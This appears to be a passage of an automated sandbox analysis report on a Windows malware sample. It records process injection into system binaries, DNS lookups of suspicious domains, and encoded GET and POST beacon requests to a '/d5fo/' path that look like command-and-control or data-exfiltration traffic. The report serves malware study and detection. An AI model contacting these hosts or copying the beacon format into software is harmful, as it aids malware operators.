Source:	Binary string: DevicePairingWizard.pdb source: svchost.exe, 00000002.00000003.2170966741.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2171044272.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, ljryBmFNsYlm.exe, 00000003.00000002.4470522322.00000000012F8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: DevicePairingWizard.exe, 00000004.00000002.4472629196.000000000529C000.00000004.10000000.00040000.00000000.sdmp, DevicePairingWizard.exe, 00000004.00000002.4470197861.0000000002E2C000.00000004.00000020.00020000.00000000.sdmp, ljryBmFNsYlm.exe, 00000006.00000002.4471489366.000000000335C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2542910321.0000000032B7C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: DevicePairingWizard.exe, 00000004.00000002.4472629196.000000000529C000.00000004.10000000.00040000.00000000.sdmp, DevicePairingWizard.exe, 00000004.00000002.4470197861.0000000002E2C000.00000004.00000020.00020000.00000000.sdmp, ljryBmFNsYlm.exe, 00000006.00000002.4471489366.000000000335C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2542910321.0000000032B7C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: DevicePairingWizard.pdbGCTL source: svchost.exe, 00000002.00000003.2170966741.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2171044272.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, ljryBmFNsYlm.exe, 00000003.00000002.4470522322.00000000012F8000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	Code function: 0_2_00E84696 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00E84696
Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	Code function: 0_2_00E8C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_00E8C9C7
Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	Code function: 0_2_00E8C93C FindFirstFileW,FindClose,	0_2_00E8C93C
Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	Code function: 0_2_00E8F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00E8F200
Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	Code function: 0_2_00E8F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00E8F35D
Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	Code function: 0_2_00E8F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00E8F65E
Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	Code function: 0_2_00E83A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00E83A2B
Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	Code function: 0_2_00E83D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00E83D4E
Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	Code function: 0_2_00E8BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00E8BF27
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_00B1D460 FindFirstFileW,FindNextFileW,FindClose,	4_2_00B1D460

Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4x nop then xor eax, eax	4_2_00B0ADD0
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4x nop then pop edi	4_2_00B132E0
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4x nop then pop edi	4_2_00B132DF
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4x nop then pop edi	4_2_00B132C5
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4x nop then mov ebx, 00000004h	4_2_04B30548

Networking

Performs DNS queries to domains with low reputation

Source:	DNS query: www.eh28mf3cdv.xyz
Source:	DNS query: www.bieniastest.xyz

Source: Joe Sandbox View	IP Address: 23.251.54.212 23.251.54.212
Source: Joe Sandbox View	IP Address: 23.251.54.212 23.251.54.212
Source: Joe Sandbox View	IP Address: 67.223.117.189 67.223.117.189
Source: Joe Sandbox View	IP Address: 74.208.236.162 74.208.236.162

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe

Code function: 0_2_00E925E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_00E925E2

Source: global traffic	HTTP traffic detected: GET /d5fo/?7b7D=GhGyKhGC7sKxzKp8eGdmcVyQLOHVXUrHMU0qcIbEymnWOlPdhkadwEXOFBFKC9rDKAL9A3qPLxSgX4nFFBMT0Qr3C3Mt9G1yNIIz6WxytSSBQEHhhuhnAxkZUHOGfulFQA==&jlx=Zd48SBF0d HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.lookstudiov.comConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0
Source: global traffic	HTTP traffic detected: GET /d5fo/?7b7D=ZpdAgvspmy+hTWfIGO3yX+xvrXsAMei4bBOt8BxrswmHE1awNdipNiT+j4hdfFyjFWMSgEHKkrcEvKgvyxqjFaD+81oW/DCEN2Oo1sUO/kySitSS9PIrivUN0n61HzGWTA==&jlx=Zd48SBF0d HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.pandafitnessboo.comConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0
Source: global traffic	HTTP traffic detected: GET /d5fo/?7b7D=Y250bjw/Eb4JaDsvBgJQoO5DcTGKRg2TY8WwpeWRYSxf0AM6NgGJQ+gzPFJsrW2WCqa86REIjEj/npni0ixUVU6cRhsYsQ6/GuFWj4cc/ehEtPjcsd8gcWhpaBoMEh18pg==&jlx=Zd48SBF0d HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.biotecnology.orgConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0
Source: global traffic	HTTP traffic detected: GET /d5fo/?7b7D=tev49yANRQivQ2H4f+MkRUEB2Mcj1uW8WqvLk8Twyqy4p8R5Cvi5e/R3eBho8SytCOZYadrHp/TLGFpXXvbZlqSupKHvTXQyyrLbAfI6hIrWLGnSWN9T94Bpfqoaz0W+fg==&jlx=Zd48SBF0d HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.bitmapsportsbook.comConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0
Source: global traffic	HTTP traffic detected: GET /d5fo/?7b7D=ZtxaWCYYlalaBLbUZEg6r6j4osC8kpYtaMEhijkB8H2iy1ANSqSP0R6JXlSUbXLuwPWrlga8EoblOOmZuDHqStQkZ0ENq5OQUfKh4Zv5agv6mVk/8VHvrdHyJdoKzVeyYg==&jlx=Zd48SBF0d HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.techstone.topConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0
Source: global traffic	HTTP traffic detected: GET /d5fo/?7b7D=UorOUJsNhtzOpcbW6pRD7y2oLw3yU53b7AktnJqWMfC1hZfMFH0XzXkRJ4yWQIlKeaDAqwcN0the3qftPUt4DeI9smIFWq5tw4RBCGM6pKiUjuqW8ii8RfKWeFMpWQWMaw==&jlx=Zd48SBF0d HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.anuts.topConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0
Source: global traffic	HTTP traffic detected: GET /d5fo/?7b7D=LMFtkAbNwZ2elB2GqME+IyQxX7DpzdHWKaIeqICYjgo7Pf7uTIFX4zBwXYBOYcYwGUmItxrSVLCWdjm98wNi/v/M/fTrXywXbqzKp2nVAwJXJwrN8i8cZj3fKe75XwP3Sw==&jlx=Zd48SBF0d HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.bieniastest.xyzConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0
Source: global traffic	HTTP traffic detected: GET /d5fo/?7b7D=uO5Cag4gyB16R4iku6nvf5dW+UrTPsxCj8IlAS8oNZUsLlnW35hToihdihlq36/h3E+gT/kMW6N0rvSH4h3g2fSBlwf/dqlLAFh1+9LorWG4QUGEfHw1eqFMmW/Mf4Jk1w==&jlx=Zd48SBF0d HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.energysecrets.onlineConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0
Source: global traffic	HTTP traffic detected: GET /d5fo/?7b7D=ZoXaLL1C2LxABKmzU+uAeFGCSUlhX2sBfFTw5kxSjKfk1lG95weQhtNNyHrXPpHYE/uGkrqw326vaL5ZgkXLo2gNXChAFCFsbLn6IDP+WIMmIvKyPAe59HrgtZ5PGeCysw==&jlx=Zd48SBF0d HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.www00003.icuConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0
Source: global traffic	HTTP traffic detected: GET /d5fo/?7b7D=AHzm4ye+5PiW8EK3Xc8yvQbL0W8b+QDjDz3KJBw+soEJlA3iHdW1FHFMZKYf54FvxwKLR/ceGHi29plUOxZKTvSK+yeJiXyyL9T50uSOcXQBWH3FsDfUfLjchgLwvE1adw==&jlx=Zd48SBF0d HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.primerpaintjobs.comConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0
Source: global traffic	HTTP traffic detected: GET /d5fo/?7b7D=YgMsgDJtCOjfJyENf6IYVB+j8nyLj4HpaTgxuJv8edncauxSuygt96U33iQCFym5FChTcLDhuwePnMBbbjdGUumEJzbp4n/EDj2Sbs8WnSMUCI3AXWDzfQLO1NjL1mG45A==&jlx=Zd48SBF0d HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.gacorslot188.comConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0

Source: DevicePairingWizard.exe, 00000004.00000002.4472629196.0000000005B3A000.00000004.10000000.00040000.00000000.sdmp, ljryBmFNsYlm.exe, 00000006.00000002.4471489366.0000000003BFA000.00000004.00000001.00040000.00000000.sdmp

String found in binary or memory: <a href="https://www.facebook.com/piensasolutions" class="lower" target="_blank" title="S equals www.facebook.com (Facebook)

Source: global traffic	DNS traffic detected: DNS query: www.2iqaoe.sbs
Source: global traffic	DNS traffic detected: DNS query: www.lookstudiov.com
Source: global traffic	DNS traffic detected: DNS query: www.pandafitnessboo.com
Source: global traffic	DNS traffic detected: DNS query: www.biotecnology.org
Source: global traffic	DNS traffic detected: DNS query: www.eh28mf3cdv.xyz
Source: global traffic	DNS traffic detected: DNS query: www.fourgrouw.cfd
Source: global traffic	DNS traffic detected: DNS query: www.inform-you.com
Source: global traffic	DNS traffic detected: DNS query: www.bitmapsportsbook.com
Source: global traffic	DNS traffic detected: DNS query: www.techstone.top
Source: global traffic	DNS traffic detected: DNS query: www.anuts.top
Source: global traffic	DNS traffic detected: DNS query: www.bieniastest.xyz
Source: global traffic	DNS traffic detected: DNS query: www.energysecrets.online
Source: global traffic	DNS traffic detected: DNS query: www.www00003.icu
Source: global traffic	DNS traffic detected: DNS query: www.primerpaintjobs.com
Source: global traffic	DNS traffic detected: DNS query: www.gacorslot188.com
Source: global traffic	DNS traffic detected: DNS query: www.fwbkl.com

Source: unknown

HTTP traffic detected: POST /d5fo/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflateHost: www.pandafitnessboo.comOrigin: http://www.pandafitnessboo.comCache-Control: no-cacheContent-Type: application/x-www-form-urlencodedConnection: closeContent-Length: 205Referer: http://www.pandafitnessboo.com/d5fo/User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0Data Raw: 37 62 37 44 3d 55 72 31 67 6a 59 35 6e 74 53 4f 6c 5a 6d 37 4d 55 4b 33 65 65 73 73 62 6c 6d 49 47 43 65 65 6c 5a 43 2b 44 73 52 42 41 30 68 76 36 4f 58 4f 37 4c 76 47 6d 49 41 72 30 6a 74 34 51 49 6c 71 66 50 42 68 45 39 32 33 42 74 4b 56 6c 77 4b 4d 33 75 52 43 50 4f 5a 57 41 37 47 6f 5a 30 53 54 73 4d 55 53 34 69 63 59 44 31 55 37 55 6e 74 48 39 38 63 38 71 79 66 74 6b 70 57 65 38 66 79 47 59 47 76 30 74 51 77 72 45 6b 78 71 53 37 65 6e 56 6e 55 68 55 61 33 4e 38 32 69 6a 7a 62 71 69 6d 59 7a 44 70 69 47 6b 51 42 55 52 4d 57 49 4d 45 36 6e 63 32 6e 32 45 42 45 31 63 48 46 55 77 51 76 70 4b 64 4b 36 59 3d Data Ascii: 7b7D=Ur1gjY5ntSOlZm7MUK3eessblmIGCeelZC+DsRBA0hv6OXO7LvGmIAr0jt4QIlqfPBhE923BtKVlwKM3uRCPOZWA7GoZ0STsMUS4icYD1U7UntH98c8qyftkpWe8fyGYGv0tQwrEkxqS7enVnUhUa3N82ijzbqimYzDpiGkQBURMWIME6nc2n2EBE1cHFUwQvpKdK6Y=

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 25 Jul 2024 10:07:38 GMTServer: ApacheX-ServerIndex: llim605Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 61 61 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 62 69 6f 74 65 63 6e 6f 6c 6f 67 79 2e 6f 72 67 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2f 63 73 73 2f 70 61 72 6b 69 6e 67 32 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 45 78 6f 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 69 64 3d 22 74 68 65 57 69 64 74 68 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 28 73 63 72 65 65 6e 2e 77 69 64 74 68 20 3c 3d 20 34 32 30 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6d 76 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 74 68 65 57 69 64 74 68 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 76 70 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 63 6f 6e 74 65 6e 74 27 2c 27 77 69 64 74 68 3d 34 30 30 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 21 2d 2d 20 63 6c 69 65 6e 74 20 2d 2d 3e 0d 0a 3c 68 65 61 64 65 72 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 25 Jul 2024 10:07:41 GMTServer: ApacheX-ServerIndex: llim604Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 61 61 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 62 69 6f 74 65 63 6e 6f 6c 6f 67 79 2e 6f 72 67 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2f 63 73 73 2f 70 61 72 6b 69 6e 67 32 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 45 78 6f 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 69 64 3d 22 74 68 65 57 69 64 74 68 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 28 73 63 72 65 65 6e 2e 77 69 64 74 68 20 3c 3d 20 34 32 30 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6d 76 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 74 68 65 57 69 64 74 68 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 76 70 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 63 6f 6e 74 65 6e 74 27 2c 27 77 69 64 74 68 3d 34 30 30 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 21 2d 2d 20 63 6c 69 65 6e 74 20 2d 2d 3e 0d 0a 3c 68 65 61 64 65 72 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 25 Jul 2024 10:07:43 GMTServer: ApacheX-ServerIndex: llim605Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 61 61 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 62 69 6f 74 65 63 6e 6f 6c 6f 67 79 2e 6f 72 67 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2f 63 73 73 2f 70 61 72 6b 69 6e 67 32 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 45 78 6f 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 69 64 3d 22 74 68 65 57 69 64 74 68 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 28 73 63 72 65 65 6e 2e 77 69 64 74 68 20 3c 3d 20 34 32 30 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6d 76 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 74 68 65 57 69 64 74 68 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 76 70 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 63 6f 6e 74 65 6e 74 27 2c 27 77 69 64 74 68 3d 34 30 30 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 